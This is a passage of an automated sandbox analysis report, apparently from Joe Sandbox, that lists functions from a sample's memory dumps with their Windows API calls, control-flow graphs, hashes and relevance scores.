                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 3911e05dd2b292888b7f2bf2d7d221328615687f4827e1d0b759e44569e339d7
                                                • Instruction ID: 220ad011d85b0282d4064e401a2b108a3b4b2d6c56f404a8e76190d52008d71d
                                                • Opcode Fuzzy Hash: 3911e05dd2b292888b7f2bf2d7d221328615687f4827e1d0b759e44569e339d7
                                                • Instruction Fuzzy Hash: F52100B5900209DFCB00CFA9D884BEEBBF4FB48324F15841AE914A3310D378A954CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DF7758 Relevance: 1.6, APIs: 1, Instructions: 57COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 427 df7758-df775a 428 df775e-df77b4 427->428 429 df775c 427->429 432 df77b6-df77de KiUserCallbackDispatcher 428->432 433 df7802-df781b 428->433 429->428 434 df77e7-df77fb 432->434 435 df77e0-df77e6 432->435 434->433 435->434
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 00DF77CD
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 082980bb200b67f2fe9c7b23f7dcef5dee65e7b18b733c741a665c732890f714
                                                • Instruction ID: 3f59a057f05bb6db43813261346c00fbe21eb279541f258b1f7f4f9ce3af44c3
                                                • Opcode Fuzzy Hash: 082980bb200b67f2fe9c7b23f7dcef5dee65e7b18b733c741a665c732890f714
                                                • Instruction Fuzzy Hash: 07219A71809389CFCB11DF64D4447EABFF4EB19328F1584ADD186A7242C778AA49CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DF8C94 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 437 df8c94-df9510 439 df9518-df9547 LoadLibraryExW 437->439 440 df9512-df9515 437->440 441 df9549-df954f 439->441 442 df9550-df956d 439->442 440->439 441->442
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00DF9329,00000800,00000000,00000000), ref: 00DF953A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 5446c5143081cbf877e50d1459c6be6db048ba2b019f75a1eb93df5c825543e9
                                                • Instruction ID: 619320c15cfb4e37d3b75cf43771896d9362413db5eaafb12aa260bc09645737
                                                • Opcode Fuzzy Hash: 5446c5143081cbf877e50d1459c6be6db048ba2b019f75a1eb93df5c825543e9
                                                • Instruction Fuzzy Hash: EF1103B6D002089FDB10CF9AD444BEEFBF4EB48324F15842AD515A7300C375A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06B24DB0 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 445 6b24db0-6b24df8 447 6b24e00-6b24e2f SetWindowTextW 445->447 448 6b24dfa-6b24dfd 445->448 449 6b24e31-6b24e37 447->449 450 6b24e38-6b24e59 447->450 448->447 449->450
                                                APIs
                                                • SetWindowTextW.USER32(?,00000000), ref: 06B24E22
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.576670572.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_6b20000_12057ad2.jbxd
                                                Similarity
                                                • API ID: TextWindow
                                                • String ID:
                                                • API String ID: 530164218-0
                                                • Opcode ID: 2cb30d7cac5d27e70711f44257af7ddb2e1a0ae67eb5a1bb2f76151b209d62a4
                                                • Instruction ID: 622433ec8953ea96557b215af0e0d4ce25f5ce3696087ddc6797db288bc9f311
                                                • Opcode Fuzzy Hash: 2cb30d7cac5d27e70711f44257af7ddb2e1a0ae67eb5a1bb2f76151b209d62a4
                                                • Instruction Fuzzy Hash: 181117B2D006498FDB14CF9AD844BDEFBF4EF48320F04846AD869A3640D338A545CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DF94CB Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 452 df94cb-df9510 453 df9518-df9547 LoadLibraryExW 452->453 454 df9512-df9515 452->454 455 df9549-df954f 453->455 456 df9550-df956d 453->456 454->453 455->456
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00DF9329,00000800,00000000,00000000), ref: 00DF953A
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: acd4d11465fbbcf726641411f937d95605d6dfecd3c372a3031efdcfdd16f151
                                                • Instruction ID: c1328a3653f709882c8a7fac7eed95ac41f668857df30b2648fb0a8e1983f4aa
                                                • Opcode Fuzzy Hash: acd4d11465fbbcf726641411f937d95605d6dfecd3c372a3031efdcfdd16f151
                                                • Instruction Fuzzy Hash: D51114B2D002099FCB10CF9AD844BDEFBF4EB48324F05842AD919A7300C375A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08080B58 Relevance: 1.6, APIs: 1, Instructions: 54windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PeekMessageW.USER32(?,?,?,?,?), ref: 08080BC8
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.576818773.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_8080000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessagePeek
                                                • String ID:
                                                • API String ID: 2222842502-0
                                                • Opcode ID: dff039ae9a39fade6845ddfbbed49ba2d22825027a162ccbe44253efa802e450
                                                • Instruction ID: d88e78086f3b967365872409cf138d47c8a6ce9ecb7b8ce54fc7d6d7bd9e0b29
                                                • Opcode Fuzzy Hash: dff039ae9a39fade6845ddfbbed49ba2d22825027a162ccbe44253efa802e450
                                                • Instruction Fuzzy Hash: 7611F9B1C002499FDB10CF99D844BDEFBF4FB48324F148429E555A7240C374A955DFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06B24DB8 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetWindowTextW.USER32(?,00000000), ref: 06B24E22
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.576670572.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_6b20000_12057ad2.jbxd
                                                Similarity
                                                • API ID: TextWindow
                                                • String ID:
                                                • API String ID: 530164218-0
                                                • Opcode ID: 1a18aaf0d1c72193492b4f18bdaaf3367eb140fbc89c661e3c59dbec758ad9b9
                                                • Instruction ID: ab6ac12da85a133020aa811c00727fe8a81c220f8aff53e9b73db15b5c376827
                                                • Opcode Fuzzy Hash: 1a18aaf0d1c72193492b4f18bdaaf3367eb140fbc89c661e3c59dbec758ad9b9
                                                • Instruction Fuzzy Hash: 3511E4B2D002598FDB14CF9AD844BDEFBF4EF88320F14846AD869A7640D378A545CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08080B60 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PeekMessageW.USER32(?,?,?,?,?), ref: 08080BC8
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.576818773.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_8080000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessagePeek
                                                • String ID:
                                                • API String ID: 2222842502-0
                                                • Opcode ID: 0fb7d8f86f3c15c2a744a59be16cb84b7fdf1a1e11e1bf7afba12d15b46532f3
                                                • Instruction ID: 04c46441b7f7e07ad361dc5be6f71738978da3b578ecf6f33bd9b7eea068f7c4
                                                • Opcode Fuzzy Hash: 0fb7d8f86f3c15c2a744a59be16cb84b7fdf1a1e11e1bf7afba12d15b46532f3
                                                • Instruction Fuzzy Hash: 4711F6B18002099FDB10CF9AD844BDEFBF8FB48324F04842AE955A3240C378A955DFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06B2A921 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 06B2A985
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.576670572.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_6b20000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: 67c77c718369ec5bb592252a3b378046d37897aeac58d7b0854a91de84b33d73
                                                • Instruction ID: b04b9be56727fffbda2bd0a19729acb4bc23bf735a1da0f56b0de0132d939f13
                                                • Opcode Fuzzy Hash: 67c77c718369ec5bb592252a3b378046d37897aeac58d7b0854a91de84b33d73
                                                • Instruction Fuzzy Hash: CA112BB18003499FDB10CF9AC845BDEFBF4EB48320F148459E554A3601D379A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DF7768 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 00DF77CD
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 2100ae0a1d16459c91876ecf7f518bec9ef122782356389612fb69f44c584226
                                                • Instruction ID: 3185e7be8149a8124137129dd0d63440fe6be4c4af9b0beb2f7fc7f045b8896a
                                                • Opcode Fuzzy Hash: 2100ae0a1d16459c91876ecf7f518bec9ef122782356389612fb69f44c584226
                                                • Instruction Fuzzy Hash: 9C119A71804388CFDB10DF99D8047EEBFF4EB08328F14846DD596A7242C778AA44CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06B2A928 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostMessageW.USER32(?,?,?,?), ref: 06B2A985
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.576670572.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_6b20000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessagePost
                                                • String ID:
                                                • API String ID: 410705778-0
                                                • Opcode ID: ae744ca35d930e1a81c9cc3524843bb0723426d5ec27d32d0f7040e89d72ccd5
                                                • Instruction ID: 7f8e17f41f3686b865863212def84b201352b218751800fbb0787ac0e172df89
                                                • Opcode Fuzzy Hash: ae744ca35d930e1a81c9cc3524843bb0723426d5ec27d32d0f7040e89d72ccd5
                                                • Instruction Fuzzy Hash: C81106B18003499FDB10CF9AC885BEEFBF8FB48324F148459E558A3641D379A954CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DF9248 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 00DF92AE
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573364400.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_df0000_12057ad2.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 7fb7517e4bf9eeb088e1f2334819c3ab0aee7c1ef35df53ce9d4ff563f50baa2
                                                • Instruction ID: c3b062626ea69fced0269a6d3045098425d826dc8e4934c2d5e1801003a08588
                                                • Opcode Fuzzy Hash: 7fb7517e4bf9eeb088e1f2334819c3ab0aee7c1ef35df53ce9d4ff563f50baa2
                                                • Instruction Fuzzy Hash: 9C1110B2C002099FCB20CF9AC844BDEFBF4EF88324F15842AD519A7200C374A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08081B78 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.576818773.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_8080000_12057ad2.jbxd
                                                Similarity
                                                • API ID: DispatchMessage
                                                • String ID:
                                                • API String ID: 2061451462-0
                                                • Opcode ID: 90e3bb5bf6e86bb72e71c4ebe807f00bb292bc0a840a7e60248a76ccc8e8295e
                                                • Instruction ID: 9fb3abec736afb5a21a92612127c4f77b0e385cf8bd44b8b393a620dc521e51e
                                                • Opcode Fuzzy Hash: 90e3bb5bf6e86bb72e71c4ebe807f00bb292bc0a840a7e60248a76ccc8e8295e
                                                • Instruction Fuzzy Hash: F411F2B1C042499FCB20DF9AD844BDEFBF4EF48324F14846AD459A3200D378A685CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06B26200 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,?,?,?), ref: 06B2625D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.576670572.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_6b20000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 0d87e4dbf0282cf1031605e396e465c50ccd7781910f6d575c9ecc1bdbb97fee
                                                • Instruction ID: bee333eea7ad54dcdfb0c90b3aa0ad542263ca0ae29d51bf441bb911182b75c3
                                                • Opcode Fuzzy Hash: 0d87e4dbf0282cf1031605e396e465c50ccd7781910f6d575c9ecc1bdbb97fee
                                                • Instruction Fuzzy Hash: D611E2B58003499FDB20CF99D889BDEFBF8FB48324F14845AE559A7200D375A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 06B261FE Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,?,?,?), ref: 06B2625D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.576670572.0000000006B20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B20000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_6b20000_12057ad2.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 18aac5a1236f0e3fc867a9bef026664f8b3a2c61ccc080f9d03c28dbd0b0098e
                                                • Instruction ID: 3549a91d7783c4e0b6732e0558ba1a7df198f78f76c2e76afd77a00c5355962a
                                                • Opcode Fuzzy Hash: 18aac5a1236f0e3fc867a9bef026664f8b3a2c61ccc080f9d03c28dbd0b0098e
                                                • Instruction Fuzzy Hash: 8211E2B58003499FDB20CF99D889BDEFBF8FB48324F14845AE559A7200D375A944CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 08081B80 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.576818773.0000000008080000.00000040.00000800.00020000.00000000.sdmp, Offset: 08080000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_8080000_12057ad2.jbxd
                                                Similarity
                                                • API ID: DispatchMessage
                                                • String ID:
                                                • API String ID: 2061451462-0
                                                • Opcode ID: 5d3fa88ebaf79e66802fad99b71d65f6a334a5976e1284fc3deb16134d695537
                                                • Instruction ID: 73f8e03469fae1ced12b0179f51a6935c536d7d4fd612bf2981242594dcfb0fa
                                                • Opcode Fuzzy Hash: 5d3fa88ebaf79e66802fad99b71d65f6a334a5976e1284fc3deb16134d695537
                                                • Instruction Fuzzy Hash: F811CEB1D046498FCB20DF9AD844BDEFBF8EB48324F14856AD459A3200D378A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00D9D3C8 Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573234224.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_d9d000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 76c0591ab10d5a350bf5f18f3ec6696ee7b99ab83b05764161efd002b87f601b
                                                • Instruction ID: f5eb812c2f5c0b0223fc069b79dd87b921c04549e1166fc8fc90eaa827eb6e0c
                                                • Opcode Fuzzy Hash: 76c0591ab10d5a350bf5f18f3ec6696ee7b99ab83b05764161efd002b87f601b
                                                • Instruction Fuzzy Hash: 212134B1604200DFDF14DF10D9C4F26BB66FB98324F28C669E9094B246C336E846CBB2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DAD01C Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573272698.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_dad000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5dedb7e87719495b103c85e4a8f0ce0d7c7db6d2e212f67c58bbf9563562b069
                                                • Instruction ID: f5681153f47bfd997e255184155c82621ca3f789b260a0ac42a6c4fe2b1f6581
                                                • Opcode Fuzzy Hash: 5dedb7e87719495b103c85e4a8f0ce0d7c7db6d2e212f67c58bbf9563562b069
                                                • Instruction Fuzzy Hash: FF2107B5608240DFDB14CF10D9C4B26BB66FB89314F24C66DD94A4B646C33AD847CA75
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DAD1D4 Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573272698.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_dad000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7c06871fc0ed38c4f269180aa32e2837cd649a07fbb4399fdfa9045a4e85495c
                                                • Instruction ID: 32f6e5f1e8219d16a0d07103d0fe6644e0679c5df0d0d766e3f031c57e29def1
                                                • Opcode Fuzzy Hash: 7c06871fc0ed38c4f269180aa32e2837cd649a07fbb4399fdfa9045a4e85495c
                                                • Instruction Fuzzy Hash: CA2107B5504200EFDB15CF10D9C4F26BB66FB85318F24CA6DD94A4B656C336DC46CA71
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DAD005 Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573272698.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_dad000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 13c47662647e30e6146c3168dcab2dddea58de895cd7004fa4292515d6ccf04b
                                                • Instruction ID: e5b7bcc587c18d73fa43a7cb0d27fe9c4df3f1fd2e946a1e9c4f420f7ab9c662
                                                • Opcode Fuzzy Hash: 13c47662647e30e6146c3168dcab2dddea58de895cd7004fa4292515d6ccf04b
                                                • Instruction Fuzzy Hash: 2C2162755093C08FCB12CF24D994B15BF72EB46314F28C5EAD8498F697C33A984ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00D9D3C3 Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573234224.0000000000D9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_d9d000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 461f3b1088b4801133942b796055613bf01aa916c788f3ba6b35944473f8eacb
                                                • Instruction ID: 201605e4d08a1f956fadbad77a8613788c61ffb2abc92cd249d2d36caf702b05
                                                • Opcode Fuzzy Hash: 461f3b1088b4801133942b796055613bf01aa916c788f3ba6b35944473f8eacb
                                                • Instruction Fuzzy Hash: 6811C876504280DFDF15CF10D9C4B16BF72FB94324F28C6A9D8494B656C336E85ACBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00DAD1CF Relevance: .1, Instructions: 53COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.573272698.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_dad000_12057ad2.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7f04ba7eb95aaae6369f92ad73d01107cd86b8e16e4c85f5838a26f24f245082
                                                • Instruction ID: ebec631b81c1644c0b48c1c6ccde9fdec0ea5d26873c6cd3a701fab8ccaf0306
                                                • Opcode Fuzzy Hash: 7f04ba7eb95aaae6369f92ad73d01107cd86b8e16e4c85f5838a26f24f245082
                                                • Instruction Fuzzy Hash: CC119D75904280DFCB11CF10D5C4B19FBB2FB85324F28C6ADD84A4BA56C33AD84ACB61
                                                Uniqueness

                                                Uniqueness Score: -1.00%